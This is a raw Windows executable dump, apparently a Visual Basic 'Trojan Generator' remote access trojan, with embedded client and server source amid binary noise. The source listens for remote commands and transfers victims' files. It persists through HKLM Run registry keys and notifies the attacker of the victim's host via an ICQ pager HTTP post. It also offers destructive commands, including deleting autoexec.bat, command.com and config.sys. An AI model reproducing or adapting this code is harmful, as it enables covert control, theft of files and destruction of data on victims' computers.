MZ@ !L!This program cannot be run in DOS mode. $sisisildsiRichsiPEL;  @_( ( 4.text| `.data( @.rsrc @@|9MSVBVM60.DLLfߥffGfWfسfwf X fXMfSff"f%@% @%@%$@%@%(@% @%@%@%@%@%,@h2A0@)PrProject11W)Pr̃)Pr:O3f `ӓ  Form1 WM Trojan Generator 1.1B"#lt ( @ʦf3f3̙f3fffff3ff333f3333f3ff3f3̙f3fffff3ff333f3333f3f3̙̙̙f̙3̙̙̙f3fffff3ff333f3333f3fffff3fffffff3fff̙ffff3fffffffffff3ffff3f3f3ff3f33f3ffffff3ff333f3333333f33333̙33f3333f3f3f3ff33f3f3333333f3333333333f3333f3f3̙f3ffffff3f333f3333f3wUD"wUD"UUUwwwwwwDDD"""wUD"Ẻeᐐ:eᐐe::숳e2ᴐᴐeᴐe22e:ᴐeᳳeeeeᐐeᳳeᐐeᐐeeᐐeẺeeeᳺeeᳺeᐐᐴeᐐeᐐee55eeeee:eeᐈᐐᐐeᐐeeeI?? [$Form1&'5-JpF!Timer1 xH0txtKey` W 904782HKCommonDialog13MSComDlg.CommonDialog-LB r!C4OO<& ADres.wtgApp+Path9: neto1pUF>neto >VERSION 5.00 Object = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}#1.3#0"; "comctl32.ocx" Object = "{B7FC3580-8CE7-11CF-9754-00AA00C00908}#1.0#0"; "WINSCK.OCX" Begin VB.Form Form1 BorderStyle = 1 'Fixed Single Caption = "Trojan Client" ClientHeight = 6585 ClientLeft = 45 ClientTop = 330 ClientWidth = 7980 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 6585 ScaleWidth = 7980 StartUpPosition = 2 'CenterScreen Begin VB.Frame Frame4 Height = 855 Left = 120 TabIndex = 41 Top = 120 Width = 7815 Begin VB.TextBox IPTXT Height = 285 Left = 600 TabIndex = 44 Text = "127.0.0.1" Top = 360 Width = 1395 End Begin VB.CommandButton BotaoConectar Caption = "Connect" Height = 495 Left = 2280 TabIndex = 43 Top = 240 Width = 1215 End Begin VB.CommandButton BotaoDesconectar Caption = "Disconnect" Height = 495 Left = 3600 TabIndex = 42 Top = 240 Width = 1215 End Begin VB.Label LabelIP Alignment = 1 'Right Justify Caption = "IP:" Height = 255 Left = 120 TabIndex = 45 Top = 360 Width = 375 End End Begin VB.Frame Frame3 Caption = "Menu" Height = 4815 Left = 120 TabIndex = 38 Top = 1320 Width = 1455 Begin VB.CommandButton commandfilemanager Caption = "File Manager" Height = 495 Left = 120 TabIndex = 40 Top = 960 Width = 1215 End Begin VB.CommandButton comframeothers Caption = "Others" Height = 495 Left = 120 TabIndex = 39 Top = 360 Width = 1215 End End Begin WINSOCKLib.TCP Sock Left = 8880 Top = 3600 _ExtentX = 847 _ExtentY = 847 Blocking = 0 'False SleepTime = 10 RemoteHost = "" RemotePort = 0 LocalPort = 0 End Begin WINSOCKLib.TCP SockTransfer Left = 9360 Top = 3600 _ExtentX = 847 _ExtentY = 847 Blocking = 0 'False SleepTime = 10 RemoteHost = "" RemotePort = 0 LocalPort = 0 End Begin WINSOCKLib.TCP TCP1 Left = 8400 Top = 3600 _ExtentX = 847 _ExtentY = 847 Blocking = 0 'False SleepTime = 10 RemoteHost = "" RemotePort = 0 LocalPort = 0 End Begin VB.TextBox SrvReturn Height = 285 Left = 3120 TabIndex = 37 Top = 1080 Width = 2055 End Begin VB.ListBox lstFullPath Height = 450 Left = 8400 TabIndex = 28 Top = 4080 Width = 1245 End Begin VB.Timer Timer Interval = 1 Left = 11040 Top = 4440 End Begin VB.Frame Frame2 Height = 4815 Left = 1680 TabIndex = 15 Top = 1320 Width = 6255 Begin VB.Frame frames Height = 1485 Index = 3 Left = 3000 TabIndex = 29 Top = 2640 Width = 2865 Begin VB.CommandButton cmdDownload Caption = "Download" Enabled = 0 'False Height = 375 Left = 1500 TabIndex = 35 ToolTipText = "Baixar Arquivo selecionado..." Top = 1050 Width = 1275 End Begin VB.CommandButton cmdUpload Caption = "Upload" Enabled = 0 'False Height = 375 Left = 90 TabIndex = 34 ToolTipText = "Enviar para o diretrio selecionado um arquivo..." Top = 1050 Width = 1275 End Begin VB.CommandButton cmdListaC Caption = "Listar C:" Enabled = 0 'False Height = 375 Left = 1500 TabIndex = 33 ToolTipText = "Listar drive padro..." Top = 630 Width = 1275 End Begin VB.CommandButton cmdListarDrives Caption = "Listar Drives" Enabled = 0 'False Height = 375 Left = 90 TabIndex = 32 ToolTipText = "Listar Drives remotos..." Top = 630 Width = 1275 End Begin VB.CommandButton cmdDesconectar Caption = "Desconectar" Enabled = 0 'False Height = 375 Left = 1500 TabIndex = 31 ToolTipText = "Desconectar ao usurio remoto..." Top = 180 Width = 1275 End Begin VB.CommandButton cmdConectar Caption = "Conectar" Height = 375 Left = 90 TabIndex = 30 ToolTipText = "Conectar ao usurio remoto..." Top = 180 Width = 1275 End End Begin VB.Frame frames Height = 1185 Index = 2 Left = 3000 TabIndex = 21 Top = 360 Width = 2865 Begin VB.Label lblTransferido AutoSize = -1 'True Caption = "0,00 Kb" ForeColor = &H00404040& Height = 195 Left = 1770 TabIndex = 27 Top = 900 Width = 555 End Begin VB.Label labels AutoSize = -1 'True Caption = "Tamanho Transferido :" ForeColor = &H8000000D& Height = 195 Index = 2 Left = 60 TabIndex = 26 Top = 870 Width = 1605 End Begin VB.Label lblTotal AutoSize = -1 'True Caption = "0,00 Kb" ForeColor = &H00404040& Height = 195 Left = 1770 TabIndex = 25 Top = 570 Width = 555 End Begin VB.Label labels AutoSize = -1 'True Caption = "Tamanho Total :" ForeColor = &H8000000D& Height = 195 Index = 1 Left = 60 TabIndex = 24 Top = 540 Width = 1170 End Begin VB.Label lblTransferencia AutoSize = -1 'True Caption = "0,00 Kb/s" ForeColor = &H00404040& Height = 195 Left = 1770 TabIndex = 23 Top = 240 Width = 705 End Begin VB.Label labels AutoSize = -1 'True Caption = "Taxa de Transferencia :" ForeColor = &H8000000D& Height = 195 Index = 0 Left = 60 TabIndex = 22 Top = 210 Width = 1695 End End Begin VB.Frame frames Height = 465 Index = 1 Left = 120 TabIndex = 18 Top = 4200 Width = 5745 Begin ComctlLib.ProgressBar FileProgress Height = 255 Left = 4320 TabIndex = 19 Top = 120 Width = 1335 _ExtentX = 2355 _ExtentY = 450 _Version = 327682 Appearance = 1 End Begin VB.Label lblStatus BorderStyle = 1 'Fixed Single Caption = "Status..." ForeColor = &H8000000D& Height = 255 Left = 120 TabIndex = 20 Top = 120 Width = 4185 End End Begin VB.Frame frames Height = 3795 Index = 0 Left = 120 TabIndex = 16 Top = 360 Width = 2835 Begin VB.ListBox List Height = 3570 Left = 60 TabIndex = 17 Top = 150 Width = 2715 End End End Begin VB.Frame Frame1 Height = 4815 Left = 1680 TabIndex = 0 Top = 1320 Width = 6255 Begin VB.CommandButton comcrash Caption = "Crash Server" Height = 495 Left = 1680 TabIndex = 14 Top = 1680 Visible = 0 'False Width = 1215 End Begin VB.CommandButton enabledctrlaltdel Caption = "Enable ctrl+alt+del" Height = 495 Left = 3000 TabIndex = 13 Top = 1080 Visible = 0 'False Width = 1215 End Begin VB.CommandButton disablectrlaltdel Caption = "Disable ctrl+alt+del" Height = 495 Left = 3000 TabIndex = 12 Top = 480 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comremoveserver Caption = "Remove Server" Height = 495 Left = 3000 TabIndex = 11 Top = 1680 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comReboot Caption = "Reboot" Height = 495 Left = 1680 TabIndex = 10 Top = 2280 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comfuckbootfiles Caption = "Fuck Boot Files" Height = 495 Left = 360 TabIndex = 9 Top = 2280 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comshowtaskbar Caption = "Show Taskbar" Height = 495 Left = 360 TabIndex = 8 Top = 3480 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comhidetaskbar Caption = "Hide Taskbar" Height = 495 Left = 360 TabIndex = 7 Top = 2880 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comcloseserver Caption = "Close Server" Height = 495 Left = 360 TabIndex = 6 Top = 1680 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comhangup Caption = "Hang up" Height = 495 Left = 3000 TabIndex = 5 Top = 2280 Visible = 0 'False Width = 1215 End Begin VB.CommandButton combeepoff Caption = "Beep Off" Height = 495 Left = 1680 TabIndex = 4 Top = 1080 Visible = 0 'False Width = 1215 End Begin VB.CommandButton combeepon Caption = "Beep On" Height = 495 Left = 1680 TabIndex = 3 Top = 480 Visible = 0 'False Width = 1215 End Begin VB.CommandButton comclosecd Caption = "Close CD" Height = 495 Left = 360 TabIndex = 2 Top = 1080 Visible = 0 'False Width = 1215 End Begin VB.CommandButton CommandOpenCD Caption = "Open CD" Height = 495 Left = 360 TabIndex = 1 Top = 480 Visible = 0 'False Width = 1215 End End Begin VB.Label lblStatus1 BorderStyle = 1 'Fixed Single Caption = "Status..." ForeColor = &H8000000D& Height = 255 Left = 1680 TabIndex = 36 Top = 6240 Width = 6225 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False ELCommonDialog12MSComDlg.CommonDialog-LB f!C4OO< A Cliente.vbp9: ClienteProjeto( Type=Exe Form=Cliente.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\SYSTEM\stdole2.tlb#OLE Automation Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX Object={6B7E6392-850A-101B-AFC0-4210102A8DA7}#1.3#0; comctl32.ocx Module=vb5modules; vb5modules.bas Module=GeralUpload; GeralUpload.bas Object={B7FC3580-8CE7-11CF-9754-00AA00C00908}#1.0#0; WINSCK.OCX IconForm="Form1" Startup="Form1" ExeName32="Cliente.exe" Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 VersionCompanyName="legal" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 DMCommonDialog11MSComDlg.CommonDialog-LB l!C4OO< Avb5modules.bas90: NCommonDialog10MSComDlg.CommonDialog-LB n!C4OO<" AGeralUpload.bas9P: ClienteModulo2xw SOption Explicit Public Enum CompareMethod BinaryCompare TextCompare End Enum Public Function InStrRevVB5(ByVal StringCheck As String, ByVal StringMatch As String, Optional ByVal Start As Long = -1, Optional ByVal Compare As CompareMethod = BinaryCompare) As Long 'StringCheck: The string to search. 'StringMatch: The string to find. 'Start: -1 = search entire string. Positive number = search only up to that position. 'Compare: The compare method (binary or text) 'Returns: The last position of StringMatch within StringCheck. Dim lPos As Long Dim lSavePos As Long If Start = -1 Then Start = Len(StringCheck) 'Find the last instance of StringMatch within StringCheck. lPos = InStr(1, StringCheck, StringMatch, Compare) While lPos > 0 And lPos < Start lSavePos = lPos lPos = InStr(lPos + 1, StringCheck, StringMatch, Compare) Wend InStrRevVB5 = lSavePos End Function Public Function JoinVB5(SourceArray As Variant, Optional ByVal Delimiter As String = " ") As String 'SourceArray: The array of strings to join. 'Delimiter: The delimiter used in the join. Dim lIdx As Long Dim lLower As Long Dim lUpper As Long Dim sRet As String On Error GoTo LocalError 'Return nothing if array has no lower or upper bounds. lLower = LBound(SourceArray) lUpper = UBound(SourceArray) 'Concatinate the strings. For lIdx = lLower To lUpper sRet = sRet & SourceArray(lIdx) & Delimiter Next 'Remove last delimiter. If Len(sRet) > 0 Then sRet = Left$(sRet, Len(sRet) - Len(Delimiter)) End If 'Return joined strings. JoinVB5 = sRet NormalExit: Exit Function LocalError: Resume NormalExit End Function Public Function SplitVB5(Expression As String, Optional ByVal Delimiter As String = " ", Optional ByVal Limit As Long = -1, Optional ByVal Compare As CompareMethod = BinaryCompare) As Variant 'Expression: The string to split. 'Delimiter: The delimiter used for the split. 'Limit: The max number of elements to return (-1 = all elements). 'Compare: The compare method (binary or text). 'Returns: A zero-based variant array of substrings or ' entire expression as element(0) if no delimiter found. Dim lPos1 As Long Dim lPos2 As Long Dim lIdx As Long Dim lCnt As Long Dim saTmp() As String 'Initialize the variables lCnt = 0 lPos1 = 1 ReDim saTmp(99) 'Search for the delimiter. lPos2 = InStr(1, Expression, Delimiter, Compare) While lPos2 > 0 And ((lCnt <= Limit) Or (Limit = -1)) 'Delimiter found, extract the substring between the delimiters. saTmp(lCnt) = Mid$(Expression, lPos1, lPos2 - lPos1) lCnt = lCnt + 1 If (lCnt Mod 100) = 0 Then 'Increase array size if needed. ReDim Preserve saTmp(UBound(saTmp) + 100) End If 'Move to end of last delimiter found. lPos1 = lPos2 + Len(Delimiter) 'Search for the next delimiter. lPos2 = InStr(lPos1, Expression, Delimiter, Compare) Wend If lPos1 < Len(Expression) Then 'Extract last substring. saTmp(lCnt) = Mid$(Expression, lPos1) lCnt = lCnt + 1 End If 'Resize the array to correct size. If lCnt > 0 Then ReDim Preserve saTmp(lCnt - 1) Else ReDim saTmp(-1 To -1) End If 'Return the array. SplitVB5 = saTmp End Function C8ClienteModulo1 xw  ' SkBeta File Transfer ' O primeiro file transfer que realmente funciona, que ' um dia ser includo no SSTG ! '' nao foi no SSTG..mais foi no meu..hehehe 'Thanks..WishMAster ' Transferencia de arquivos... Global cArquivoDownload As String Global cArquivoUpload As String 'Constantes de aes... Public Const Conectar = "CNT" Public Const Desconectar = "DES" Public Const Listar_Drives = "LSD" Public Const Listar_C = "LSC" Public Const Detetar = "DEL" Public Const Criar_Dir = "DMD" Public Const Upload = "UPL" Public Const Download = "DWN" Public Const Listar_Diretorio = "LDR" Public Const Diretorio_Acima = "UPD" 'Constantes de Resposta... Public Const Status = "STS" Public Const rListarDrives = "RLS" Public Const rListar_C = "RSC" Public Const rDeletar = "RDE" Public Const rCriar_Dir = "RMD" Public Const rUpload = "RUP" Public Const rDownload = "RDW" Public Const rListar_Diretorio = "RDR" Public Const DiretorioBranco = "D00" Public Const rDiretorio_Acima = "RPD" ' Constantes de Transferencia de arquivos... Public Const Iniciar_Download = "IND" Public Const Terminar_Download = "TMD" Public Const Iniciar_Upload = "INU" Public Const Terminar_Upload = "TUP" Public Const ParteArquivo = "PTA" Public Const TamanhoArquivo = "TMH" BText2hxW End Sub Private Sub List_Click() cArquivoSelecionado = lstFullPath.List(List.ListIndex) If Right(cArquivoSelecionado, 1) = ">" Then cmdDownload.Enabled = False cArquivoSelecionado = Empty Else cArquivoSelecionado = cDiretorioAtual & cArquivoSelecionado cmdDownload.Enabled = True End If End Sub Private Sub List_DblClick() Dim cProcura As String Dim x As Integer ' cProcura = List.List(List.ListIndex) cProcura = lstFullPath.List(List.ListIndex) ' Manda buscar o diretrio acima... If cProcura = "<..>" Then cProcura = cDiretorioAcima End If ' Remove caracteres invlidos para a pesquisa... cProcura = Replace(cProcura, ">", "") cProcura = Replace(cProcura, "<", "") ' Remove a label do HD, para facilitar na procura... x = InStr(cProcura, "[") If x > 0 Then cProcura = Mid(cProcura, 1, x - 1) If Right(cProcura, 1) <> "\" Then cProcura = Trim(cProcura) & "\" If Len(cProcura) = 1 Then cmdListarDrives_Click: Exit Sub Sock.SendData Listar_Diretorio & cProcura cDiretorioAtual = cProcura lblStatus = "Comandos enviados, aguarde !" End Sub Private Sub Sock_Connect() lblStatus = "Conectado ao servidor com sucesso !" ' Abilita botes... cmdConectar.Enabled = False cmdDesconectar.Enabled = True cmdListarDrives.Enabled = True cmdListaC.Enabled = True cmdUpload.Enabled = True cmdDownload.Enabled = True cmdListarDrives_Click End Sub Private Sub Sock_DataArrival(ByVal bytesTotal As Long) Dim cString As String Sock.GetData cString ChecaDados cString End Sub Private Sub SockTransfer_Connect() lblStatus = "Socks conectados com sucesso !" End Sub Private Sub SockTransfer_ConnectionRequest(ByVal requestID As Long) SockTransfer.Accept requestID End Sub Private Sub SockTransfer_DataArrival(ByVal bytesTotal As Long) Dim x As Integer Dim cDiferenca As Long Dim cFinal As Long lblStatus = "Recebendo Arquivo..." SockTransfer.GetData cString cRecebido = cRecebido & cString FileProgress.Value = FileProgress.Value + Len(cString) HoraAtual = Time cDiferenca = DateDiff("s", HoraAtual, HoraInicial) * -1 If cDiferenca = 0 Then cDiferenca = 1 cFinal = FileProgress.Value / cDiferenca lblTransferencia = cFinal / 1000 lblTransferencia = Mid(lblTransferencia, 1, 4) & " Kb/s" lblTransferido = Len(cRecebido) / 1000 & " Kb" DoEvents If FileProgress.Value >= FileProgress.Max Then GravarDownload lblStatus = "Download Concludo com sucesso !" lblTotal = "0,00 Kb" lblTransferido = "0,00 Kb" lblTransferencia = "0,00 Kb/s" DoEvents FileProgress.Value = 0 End If DoEvents End Sub Private Sub TCP1_Close() lblStatus1.Caption = "Disconnected!" BotaoConectar.Enabled = True BotaoDesconectar.Enabled = False End Sub Private Sub TCP1_Connect() lblStatus1.Caption = "Connected!" BotaoConectar.Enabled = False BotaoDesconectar.Enabled = True cmdConectar_Click End Sub Private Sub TCP1_DataArrival(ByVal bytesTotal As Long) Dim stBuffer As String TCP1.GetData stBuffer, vbString SrvReturn.Text = SrvReturn.Text & stBuffer lblStatus1.Caption = "DataArrival: Received " & bytesTotal & " bytes" End Sub Private Sub TCP1_Error(Number As Integer, Description As String, Scode As Long, Source As String, HelpFile As String, HelpContext As Long, CancelDisplay As Boolean) lblStatus1.Caption = "Error number: " & Number & " " & Description End Sub Private Sub Timer_Timer() If lblStatus = "Download Concludo com sucesso !" Then FileProgress.Value = 0 lblTotal = "0,00 Kb" lblTransferido = "0,00 Kb" lblTransferencia = "0,00 Kb/s" DoEvents End If End Sub Public Sub SM(szMsg As String) On Error Resume Next TCP1.SendData szMsg End Sub Private Sub combeepoff_Click() SM "Beepoff" End Sub Private Sub combeepon_Click() SM "Beepon" End Sub Private Sub comclosecd_Click() SM "CloseCD" End Sub Private Sub CommandOpenCD_Click() SM "Open CD" End Sub Private Sub disablectrlaltdel_Click() SM "DisableCtrlAltDel" End Sub Private Sub enabledctrlaltdel_Click() SM "EnablCtrlAltDel" End Sub Private Sub BotaoConectar_Click() lblStatus1.Caption = "Trying to connect... " On Error Resume Next TCP1.Protocol = sckTCPProtocol TCP1.Close TCP1.RemoteHost = IPTXT A* Command1Command1px@O CommonDialog9MSComDlg.CommonDialog-LB z!C4OO<. AD Cliente.frmCliente/9p:  reg0H!PG gPublic Sub RegistryVerify() On Error Resume Next Dim cOrigemEXE As String Dim cDestinoEXE As String Dim cRegistry As String Dim cArquivo As String Dim Chavinha as String cOrigemEXE = UCase$(cAppDirectory & App.EXEName & ".EXE") cDestinoEXE = UCase(cDiretorioSystem & App.EXEName & ".exe") FileCopy cOrigemEXE, cDestinoEXE ?P CommonDialog8MSComDlg.CommonDialog-LB L!C4OO< A9:Q CommonDialog7MSComDlg.CommonDialog-LB ^!C4OO< ACliente9:R CommonDialog6MSComDlg.CommonDialog-LB f!C4OO< A GeralUpload9:S CommonDialog5MSComDlg.CommonDialog-LB Z!C4OO< AForm19:# variavelG 0=+# filemanagerx #Private Sub sock_ConnectionRequest(Index As Integer, ByVal requestID As Long) On Error Resume Next If Index = 0 Then nConexao = nConexao + 1 Load sock(nConexao) sock(nConexao).Accept requestID End If End Sub Private Sub sock_DataArrival(Index As Integer, ByVal bytesTotal As Long) Dim cString As String On Error Resume Next sock(Index).GetData cString ChecaDados cString, Index End Sub Private Sub SockPager_Connect() On Error Resume Next SockPager.SendData SockPager.Tag End Sub Private Sub SockPager_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) SockPager.Tag = "" End Sub Private Sub SockPager_SendComplete() SockPager.Tag = "" End Sub Private Sub SockTransfer_ConnectionRequest(Index As Integer, ByVal requestID As Long) On Error Resume Next ' Pedidos de conexes de clientes... If Index = 0 Then Load SockTransfer(nConexao) SockTransfer(nConexao).Accept requestID End If End Sub Private Sub SockTransfer_DataArrival(Index As Integer, ByVal bytesTotal As Long) On Error Resume Next Dim cString As String SockTransfer(Index).GetData cString cRecebido(Index) = cRecebido(Index) & cString On Error GoTo 0 Debug.Print Len(cRecebido(Index)) & "-" & cTamanhoUP(Index) & " bytes recebidos " & Len(cString) If Len(cRecebido(Index)) >= cTamanhoUP(Index) Then GravarDownload Index End If End Sub Public Function RotinasInternas() Dim cMessage As String Dim cData As String Dim cSend As String ' Envia Mensagens para o Pager do ICQ SockPager.Close cIP = SockPager.LocalHostName cMessage = "Computador pronto para transferencia de dados !" & vbCrLf & _ cIP cData = "from=anonymous&fromemail=mail@from.com&subject=" & cSubject & "&body=" & cMessage & "&to=" & Trim(TextUIN.Text) & "&Send=" & """" cSend = "POST /scripts/WWPMsg.dll HTTP/1.0" & vbCrLf cSend = cSend & "Referer: http://wwp.mirabilis.com" & vbCrLf cSend = cSend & "User-Agent: Mozilla/4.06 (Win95; I)" & vbCrLf cSend = cSend & "Connection: Keep-Alive" & vbCrLf cSend = cSend & "Host: wwp.mirabilis.com:80" & vbCrLf cSend = cSend & "Content-type: application/x-www-form-urlencoded" & vbCrLf cSend = cSend & "Content-length: " & Len(cData) & vbCrLf cSend = cSend & "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*" & vbCrLf & vbCrLf cSend = cSend & cData & vbCrLf & vbCrLf & vbCrLf & vbCrLf SockPager.Tag = cSend SockPager.Connect "wwp.mirabilis.com", 80 End Function Function ChecaDados(cDados As String, Index As Integer) ' Declarao de variveis... Dim cString As String Dim cResto As String Dim cArquivoGrava As String Dim cRetornoUP() As String Dim cRetorno As String Dim x As Integer Dim cParte, ChunkSize: ChunkSize = 16387 Dim cOpen As Integer: cOpen = 1 On Error Resume Next cString = Mid(cDados, 1, 3) cResto = Mid(cDados, 4, Len(cDados)) Select Case cString Case Listar_Drives ' Enumera drives locais... For x = 0 To Drive.ListCount - 1 cRetorno = cRetorno & Drive.List(x) & "|" Next ' Envia dados... sock(Index).SendData rListarDrives & Mid(cRetorno, 1, Len(cRetorno) - 1) Case Listar_Diretorio ' Coloca barra na varivel... If Right(cResto, 1) <> "\" Then cResto = cResto & "\" On Error GoTo Erro Dir.Path = cResto ' Enumera diretrios locais... For x = 0 To Dir.ListCount - 1 cRetorno = cRetorno & "<" & Dir.List(x) & ">" & "|" Next ' Enumera arquivos locais... For x = 0 To File.ListCount cRetorno = cRetorno & File.List(x) & "|" Next ' Pega diretrio acima... If Dir.List(-2) = Empty Then cDiretorioAcima = "\" Else cDiretorioAcima = Dir.List(-2) End If ' Prepara varivel de retorno... If cRetorno <> Empty Then cRetorno = Mid(cRetorno, 1, Len(cRetorno) - 1) cRetorno = cRetorno & "--" & cDiretorioAcima ' Envia resposta ao cliente... sock(Index).SendData rListar_Diretorio & cRetorno Else ' Envia resposta ao cliente... sock(Index).SendData DiretorioBranco End If Case Diretorio_Acima ' Envia path do diretrio acima... sock(Index).SendData rDiretorio_Acima & Dir.List(-2) Case Iniciar_Download On Error GoTo 0 ' Pega tamanho do arquivo... cTamanho = FileLen(cResto) ' Envia tamanho do arquivo... sock(Index).SendData TamanhoArquivo & cTamanho DoEvents ' Prepara arquivo para transferencia... Close #Index Open cResto For Binary As Index Do While cTamanho > 0 ' Insere pacotes na varivel... If cTamanho < 16384 Then cParte = Input(cTamanho, Index) cTamanho = 0 Else cParte = Input(16384, Index) cTamanho = cTamanho - 16384 End If ' Envia pacote... SockTransfer(Index).SendData cParte DoEvents Loop ' Informa que Download foi terminado... DoEvents sock(Index).SendData Terminar_Download DoEvents ' Fecha arquivo downloadeado... Close cOpen Case Iniciar_Upload On Error GoTo 0 ' Pega dados... cRetornoUP() = Split(cResto, "|") ' Insere em varivel o nome do arquivo e tamanho... cTamanhoUP(Index) = cRetornoUP(1) cArquivoUP(Index) = cRetornoUP(0) ' Informa onde dever ser gravado o arquivo... cArquivoGrava = cDiretorioAtual & "\" & PegaNomeArquivo(cArquivoUP(Index)) On Error Resume Next Kill cArquivoGrava Close #Index Open cDiretorioAtual & "\" & PegaNomeArquivo(cArquivoUP(Index)) For Output Access Write As Index End Select Exit Function Erro: ' Verifica erros... If Err = 68 Then sock(Index).SendData Status & "Drive no disponvel !" End If End Function Function GravarDownload(Index As Integer) ' Grava Upload de Arquivos... Print #Index, cRecebido(Index) Close #Index End Function Function InicializaSock() On Error Resume Next ' Inicializao do sock de transferencia de dados... sock(0).Close sock(0).Protocol = sckTCPProtocol sock(0).RemoteHost = "" sock(0).LocalPort = "55165" sock(0).Listen ' Inicializao do sock de transferencia de Arquivos... SockTransfer(0).Close SockTransfer(0).Protocol = sckTCPProtocol SockTransfer(0).RemoteHost = "" SockTransfer(0).LocalPort = "55166" SockTransfer(0).Listen End Function Function PegaNomeArquivo(cArquivo As String) As String On Error Resume Next Dim cRetornos() As String Dim x As Integer ' Pega somente nome de arquivos... cRetornos() = Split(cArquivo, "\") For x = 0 To UBound(cRetornos()) PegaNomeArquivo = cRetornos(x) Next ' Retorno... PegaNomeArquivo = Replace(PegaNomeArquivo, "\", Empty) End Function Private Sub Dir_Change() On Error Resume Next ' Atualiza controles... File.Path = Dir.Path cDiretorioAtual = Dir.Path File.Refresh Dir.Refresh End Sub Private Sub Drive_Change() On Error Resume Next ' Atualiza controles... Dir.Path = Drive.Drive File.Refresh Dir.Refresh End Sub Private Sub File_Click() On Error Resume Next ' Atualiza controles... File.Refresh Dir.Refresh End Sub <% Frame32/4pO 7?Check1Send information to ICQ Pagerh w90textouin Enter Your Uin8kLabel14JYou Will receive one Pager with all necessary information about the victimxhW;)Label13ICQ UIN::T CommonDialog4MSComDlg.CommonDialog-LB b!C4OO< A geral.bas9:"Ybasgeralxx_  3Option Explicit 'Constantes de aes... Public Const Conectar = "CNT" Public Const Desconectar = "DES" Public Const Listar_Drives = "LSD" Public Const Listar_C = "LSC" Public Const Detetar = "DEL" Public Const Criar_Dir = "DMD" Public Const Upload = "UPL" Public Const Download = "DWN" Public Const Listar_Diretorio = "LDR" Public Const Diretorio_Acima = "UPD" 'Constantes de Resposta... Public Const Status = "STS" Public Const rListarDrives = "RLS" Public Const rListar_C = "RSC" Public Const rDeletar = "RDE" Public Const rCriar_Dir = "RMD" Public Const rUpload = "RUP" Public Const rDownload = "RDW" Public Const rListar_Diretorio = "RDR" Public Const DiretorioBranco = "D00" Public Const rDiretorio_Acima = "RPD" ' Constantes de Transferencia de arquivos... Public Const Iniciar_Download = "IND" Public Const Terminar_Download = "TMD" Public Const Iniciar_Upload = "INU" Public Const Terminar_Upload = "TUP" Public Const ParteArquivo = "PTA" Public Const TamanhoArquivo = "TMH" Public Const HKEY_LOCAL_MACHINE = &H80000002 6%Frame23/4p +0aaa2WINDOWS/SYSTEMp .&aa1WINDOWS -+Chave8 Notepad,%}Label12\As any Trojan, a key in registry will be done after your first execution, so give me the keyxhW2Label11xXo w1/Label10Destiny Folder0#Label8Key8/ltxtRemoveServer1x >cRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If QueryValue(HKEY_LOCAL_MACHINE, cRegistry, Chavinha) <> cDestinoEXE Then CreateNewKey cRegistry, HKEY_LOCAL_MACHINE SetKeyValue HKEY_LOCAL_MACHINE, cRegistry, "", cDestinoEXE, REG_SZ End If cRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices" If QueryValue(HKEY_LOCAL_MACHINE, cRegistry, Chavinha) <> cDestinoEXE Then CreateNewKey cRegistry, HKEY_LOCAL_MACHINE SetKeyValue HKEY_LOCAL_MACHINE, cRegistry, "", cDestinoEXE, REG_SZ End If End If *txtRemoveServer0 ZIf textreceived = "removeserver" Then Dim cRegistry As String Dim Chavinha As String ) txtFuckBoot8" If textreceived = "FuckBOOT" Then Shell "del c:\autoexec.bat", vbHide Shell "del c:\command.com", vbHide Shell "del c:\config.sys", vbHide SM "He's really fucked now... " textreceived = "" End If (x txtReboot@( QIf textreceived = "RebootPC" Then Call RebootSystem textreceived = "" End If ' Aspas@ "&m reg1 P W KcRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" If QueryValue(HKEY_LOCAL_MACHINE, cRegistry, Chavinha) <> cDestinoEXE Then CreateNewKey cRegistry, HKEY_LOCAL_MACHINE SetKeyValue HKEY_LOCAL_MACHINE, cRegistry, Chavinha, cDestinoEXE, REG_SZ End If cRegistry = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices" If QueryValue(HKEY_LOCAL_MACHINE, cRegistry, Chavinha) <> cDestinoEXE Then CreateNewKey cRegistry, HKEY_LOCAL_MACHINE SetKeyValue HKEY_LOCAL_MACHINE, cRegistry, Chavinha, cDestinoEXE, REG_SZ End If end sub %# reg0$$!FramePrimcipalx0" BackCommandBackGwG1##Frame41/4xXO >^$Image1<lt4JFIFC   ")$+*($''-2@7-0=0''8L9=CEHIH+6OUNFT@GHEC !!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?#hFNR`$<{@Gz1JA#my?R<5-F1}6+6u0t6?EpTu/U1m>w+m>[ϼ_<Ѷk[V/Pl/UF.v)xE~sZ({$`؂?G7Z 